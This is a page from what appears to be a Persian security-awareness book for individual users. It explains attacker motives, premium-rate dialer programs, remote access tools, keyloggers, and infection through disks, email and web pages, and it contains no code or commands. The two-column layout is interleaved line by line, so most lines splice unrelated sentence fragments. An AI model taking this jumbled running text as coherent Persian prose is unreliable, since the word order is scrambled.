‫ﺩﺭ ﺍﻛﺜﺮ ﺳﺮﻗﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭﻧﺘﻴﺠﺔ ﺣﻤﻼﺕ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ‬ ‫ﻣﻬﺎﺟﻢ ﻣﺎﻳﻞ ﺍﺳﺖ ﻛﻨﺘﺮﻝ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺩﺳـﺖ ﺑﮕﻴـﺮﺩ؟‬
‫ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩﺍﻧﺪ‪ ،‬ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ‬ ‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ ،‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻮﺍﺭﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫ﺍﻳﻨﻜﻪ‪:‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﺑﺎﺭ‪ ،‬ﭘﻮﻝ ﻣﺴﺮﻭﻗﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ ﻣـﺼﺮﻑ‬ ‫ﻫﻴﭻ ﺩﻟﻴﻠﻲ ﻏﻴﺮ ﺍﺯ ﺍﺛﺒﺎﺕ ﺗﻮﺍﻧﺎﻳﻲ ﺧﻮﺩ ﺑﻪ ﺩﻭﺳﺘﺎﻧﺶ ﺑﺮﺍﻱ‬ ‫•‬
‫ﺭﺳﻴﺪﻩ ﺍﺳﺖ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻳـﻚ ﻣـﻮﺩﻡ‬ ‫ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻛﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛‬
‫ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﻮﺍﻫﺪ ﺗﺨﺮﻳﺒﮕﺮ ﺑﺎﺷﺪ؛‬ ‫•‬
‫ﺑﺎ ﻣﻘﺎﺻﺪ ﺩﻭﺭﺩﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲﺗﻮﺍﻧـﺪ‬
‫ﺻﺤﺒﺖ ﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻫﻴﭻ ﻣﺰﻳﺘﻲ ﻧﺪﺍﺭﺩ‪ ،‬ﺑﺠـﺰ‬ ‫ﺑﺮﺍﻱ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺷﻤﺎ ﺩﻟﻴﻞ ﺷﺨﺼﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛‬ ‫•‬
‫ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﺷﻴﻄﺎﻧﻲ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﺷـﻤﺎ ﺩﺭ ﭘﺎﻳـﺎﻥ‬ ‫ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣﺨـﺮﺏ ﺩﻳﮕـﺮ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫•‬
‫ﻣﺎﻩ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺳـﻨﮕﻴﻦ ﺍﺯ ﺷـﺮﻛﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﺩﺭﻳﺎﻓـﺖ‬ ‫ﻛﻨﺪ؛ ﻣﺜﻞ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻳـﺎ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ‬
‫ﻣﻲﻛﻨﻴﺪ‪.‬‬ ‫ﺳﺮﻭﻳﺲ )‪ ٥٢(DoS‬ﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ؛ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ‬
‫ﺩﺭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻬـﺮﺓ ﺷﺨـﺼﻲ‬ ‫ﺑﺨﻮﺍﻫﺪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺷﻲ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ‪.‬‬ ‫•‬
‫ﺑﺒﺮﺩ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎﺭﻩ ﺗﻠﻔـﻦ ﺧﺎﺻـﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻭﻗﺘﻲ ﺑﺎ ﺁﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﺷﺮﻛﺖ‬ ‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺎﺭﺑﺮﺩ ﻣـﺸﺎﺑﻪ ﺗﺤـﺖ‬
‫ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﻫﺮ ﺩﻗﻴﻘﻪ ﻫﺰﻳﻨﺔ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﺛﺒﺖ‬ ‫ﻋﻨــﺎﻭﻳﻨﻲ ﭼــﻮﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺭﺍﻩ ﺩﻭﺭ‪ ٥٣‬ﻳــﺎ ﺍﺑﺰﺍﺭﻫــﺎﻱ‬
‫ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻮﺽ ﻣﻘﺪﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛـﺴﻲ ﺑـﺮﻭﺩ‬ ‫ﺭﺍﻫﺒﺮﻱ ﺭﺍﻩ ﺩﻭﺭ‪ ٥٤‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺮﻭﻉ ﻭ ﺑـﺴﻴﺎﺭ ﻭ ﭘﺮﺍﺳـﺘﻔﺎﺩﻩﺍﻱ‬
‫ﻛﻪ ﺑﺎ ﺍﻭ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺍﻣـﺮ ﺩﺭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ‬ ‫ﻫﺴﺘﻨﺪ‪ .‬ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﻛـﺎﺭﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻌﺎﻣﻼﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺍﻣﺎ ﺑﻴﺸﺘﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ‬ ‫ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﻣﺎﻧﻨﺪ ﻧـﺎﻡ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻫﺎﻥ ﺭﺍﻩ ﺳﺎﺩﻩﺍﻱ ﻫﺴﺘﻨﺪ ﺗـﺎ‬ ‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺪﻭﻥ ﺿﻤﺎﻧﺖ ﻫﺰﻳﻨﻪﺍﻱ ﺭﺍ ﺍﺯ ﺣﺴﺎﺏ ﺷﻤﺎ ﻛـﺴﺮ‬ ‫‪٥٥‬‬
‫ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ‬
‫ﻧﻤﺎﻳﻨــﺪ‪ .‬ﺩﺭ ﭼﻨــﻴﻦ ﻭﺿــﻌﻴﺘﻲ ﺷــﺮﻛﺖ ﻣﺨــﺎﺑﺮﺍﺕ ﻫﺰﻳﻨــﻪﻫــﺎﻱ‬
‫ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻗﺴﻤﺘﻲ‬ ‫ﻣﻔﻬﻮﻡ "ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ" ﺍﺯ ﻧﺎﻡ ﺁﻥ ﻣﺸﺨﺺ ﺍﺳﺖ‪ .‬ﺁﻧﻬﺎ ﺗﻤـﺎﻣﻲ‬
‫ﺍﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ ﺑـﺎ ﺁﻥ‬ ‫ﻛﻠﻴﺪﻫﺎﻱ ﻓﺸﺮﺩﻩ ﺷﺪﺓ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﺍ ﺛﺒـﺖ ﻭ ﺩﺭ ﻳـﻚ ﻓﺎﻳـﻞ‬
‫ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷـﺪﻩ ﺍﺳـﺖ ﺍﺭﺳـﺎﻝ ﻛﻨـﺪ‪ .‬ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮ ﭼﻨـﻴﻦ‬ ‫ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻓﺎﻳﻞ ﻣﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺁﻳﻨـﺪﻩ ﺑـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ‬
‫ﺷﻤﺎﺭﻩﺍﻱ ﺩﺍﺷﺘﻪﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ‬ ‫ﻃﺮﻳﻖ ﺩﺭﺏ ﻣﺨﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﻛﻨﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺗﻤﺎﺱ ﺑﮕﻴـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﺗﻤـﺎﺱ ﺭﺍ‬ ‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻭﺏ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ‪.‬‬
‫ﺑﺮﻗﺮﺍﺭ ﻧﮕﻬﺪﺍﺭﺩ‪ .‬ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺩﺭ ﺻﻮﺭﺗﺤﺴﺎﺏ ﭘﺎﻳـﺎﻥ‬ ‫ﺷﺎﻳﺎﻥ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﻭﺍﻗﻌـﹰﺎ‬
‫ﻣﺎﻩ ﺗﻠﻔﻦ ﺷﻤﺎ ﺩﺭﺝ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬ ‫ﺗﺎﻳﭗ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺁﻧﭽﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ‬
‫ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎﺭﺓ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺭﺍ‬
‫ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ؟‬
‫ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺗﻨﻬﺎ ﺭﺍﻩ ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻮﺳـﻴﻠﺔ‬ ‫‪52‬‬ ‫‪Denial of Service Attack‬‬
‫ﻭﻳﺮﻭﺱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳـﺴﻜﻬﺎﻱ ﺁﻟـﻮﺩﻩ‬ ‫‪53‬‬ ‫‪Remote Access Tools‬‬
‫‪54‬‬ ‫‪Remote Administration Tools‬‬
‫‪55‬‬ ‫‪Keyloggers‬‬
‫‪٧٥‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺩﻭﻣﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭼـﻮﻥ ﺗـﻼﺵ ﺑـﺮ ﺍﻳـﻦ ﺑـﻮﺩﻩ ﻛـﻪ‬ ‫ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﻮﺩﻧـﺪ ﺗﺒـﺎﺩﻝ ﻓﺎﻳـﻞ ﺍﻧﺠـﺎﻡ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﺎﺩﻩ ﻭ ﻗﻮﻱﺗﺮ ﮔﺮﺩﺩ‪ ،‬ﺍﻣﺮﻭﺯ ﺍﻣﻜـﺎﻥ‬ ‫ﻧﻤﻲﺩﺍﺩﻳﺪ ﺩﺭ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺳـﺮ ﻣـﻲﺑﺮﺩﻳـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪UNIX‬‬
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ‪ HTML‬ﺩﺭ ﺑﺪﻧﺔ ﺍﺻﻠﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭﺟـﻮﺩ‬ ‫ﭼﻨﺪﺍﻥ ﻣﺴﺘﻌﺪ ﺩﺭﻳﺎﻓﺖ ﻭﻳﺮﻭﺱ ﻧﺒﻮﺩﻧﺪ ﺍﻣﺎ ﺑﻪ ﺩﻟﻴـﻞ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ‬
‫ﺩﺍﺭﺩ؛ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﺪ ﺣـﺎﻭﻱ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ‬ ‫ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﻜﺎﻻﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ‬
‫ﻣﺸﻜﻠﺴﺎﺯ ﺑﺎﺷﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﺪ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺭﺍ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺞ‪ ،‬ﺣﺘﻲ ﺩﺭ‬
‫ﺏ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ‬‫ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺳﻤﺖ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭ ﹺ‬ ‫ﺁﻥ ﺭﻭﺯﻫﺎ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ‬
‫ﻫﺪﺍﻳﺖ ﻛﻨﺪ ﻛﻪ ﺷﺎﻳﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻳﺎ ﻓﺮﺯﻧﺪﺍﻧﺘﺎﻥ ﻣﻨﺎﺳﺐ ﻧﺒﺎﺷﺪ‪.‬‬ ‫ﺩﺳﺘﻴﺎﺑﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻭ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﺭﺏ ﻣﺨﻔﻲ ﻧﺼﺐ‬
‫ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻭﻟﻴﻦ ﺣﺎﺩﺛﺔ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺮﻣـﻲ ﺑـﻮﺩ ﻛـﻪ ﺩﺭ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﻨﭽﻨﻴﻨـﻲ‬


‫ﺳﺎﻝ ‪ ۱۹۸۸‬ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ UNIX‬ﺣﻤﻠﻪ ﻛﺮﺩ‪ .‬ﺍﻣـﺮﻭﺯ ﻣﻤﻜـﻦ‬
‫ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺧـﻼﻕ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﺧﻴـﺮﹰﺍ ﺗﻌـﺪﺍﺩﻱ‬
‫ﺍﺳﺖ ﺷﻤﺎ ﺑﻪ ﺭﻭﺷـﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻳـﺪ‪.‬‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻣﻨﺘﺸﺮ ﺷﺪ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛـﺮﺩ‬
‫ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺫﻛﺮ ﺷـﺪﻩﺍﻧـﺪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺍﺯ ﻃﺮﻑ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﺣﺎﻭﻱ ﺁﺧﺮﻳﻦ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Macintosh‬ﻭ‬
‫ﻣﻲﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻛﺮﻣﻬـﺎ ﺍﺯ ﺷـﻤﺎ ﻣﺤﺎﻓﻈـﺖ‬
‫‪ Unix‬ﺑﻪ ﻧﻮﻋﻲ ﻧﺴﺒﺖ ﺑﻪ ﺍﻳﻦ ﺣﻤﻠﻪﻫﺎ ﻛﻤﺘـﺮ ﻣـﺴﺘﻌﺪ ﻫـﺴﺘﻨﺪ؛‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﺷﺎﻣﻞ ﺗـﺼﺎﻭﻳﺮ ﻭ ﻧﻤﺎﺩﻫـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ‬
‫ﺍﻟﺒﺘﻪ ﻧﻪ ﺍﻟﺰﺍﻣﹰﺎ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﺍﻳﻤﻦﺗﺮ ﻫـﺴﺘﻨﺪ‪ ،‬ﺑﻠﻜـﻪ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﻨﺪ ﻭ ﻟـﺬﺍ ﻛـﺎﺭﺑﺮ ﺭﺍ ﻣﺘﻘﺎﻋـﺪ‬
‫ﻻ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﺑـﺮﺍﻱ ﻣﻬـﺎﺟﻤﻴﻦ‬ ‫ﺩﻟﻴﻞ ﻛﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺿﻤﺎﻳﻢ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻋﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺑﻴﺎﻳﻨـﺪ‪ .‬ﻭﺍﺿـﺢ‬
‫ﺍﻫﺪﺍﻑ ﺟﺬﺍﺏﺗﺮﻱ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺩﺭ ﺭﺩﺓ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺿﻤﻴﻤﻪﻫﺎ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨـﺪ ﺩﭼـﺎﺭ ﺩﺭﺩﺳـﺮﻫﺎﻱ‬
‫ﺑﻌﺪﻱ ﻗﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Macintosh‬ﺗـﺎ ﺑـﻪ ﺍﻣـﺮﻭﺯ‬
‫ﺍﺳﺎﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﻛﻤﺘﺮﻳﻦ ﺻﺪﻣﻪ ﺭﺍ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺧﻮﺩ ﺩﻳﺪﻩﺍﻧﺪ‪.‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬
‫ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﺒﻜﺔ ﮔﺴﺘﺮﺩﺓ ﺟﻬـﺎﻧﻲ‪ ٥٦‬ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺪ ﺻـﻔﺤﺎﺕ‬
‫ﻭﺑﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻧﺪ ﻛﻪ ﺷﺎﻣﻞ ﻣﺘﻨﻬﺎ ﻭ ﺗﺼﺎﻭﻳﺮ ﺑﻮﺩﻧﺪ‪ .‬ﺍﻛﻨـﻮﻥ ﺍﻳـﻦ‬ ‫ﭼﻨﺪ ﺳﺎﻝ ﻗﺒـﻞ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﺎﻳﻌﺎﺗﻲ‬
‫ﮔﺴﺘﺮﺵ ﻳﺎﻓﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜـﻪ ﺑـﺎ ﺩﺭﻳﺎﻓـﺖ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺻﻔﺤﺎﺕ ﺷﺎﻣﻞ ﻣﺤﺘﻮﻳﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻫﺴﺘﻨﺪ‪ ،‬ﻣﺜـﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﭘﻮﻳــﺎﻳﻲ ﻛــﻪ ﺭﻭﻱ ﻣﺎﺷــﻴﻦ ﺷــﻤﺎ ‪ download‬ﺷــﺪﻩ ﻭ ﺍﺟــﺮﺍ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﺷـﻮﻳﺪ‪ .‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣـﺴﺌﻮﻻﻥ‬
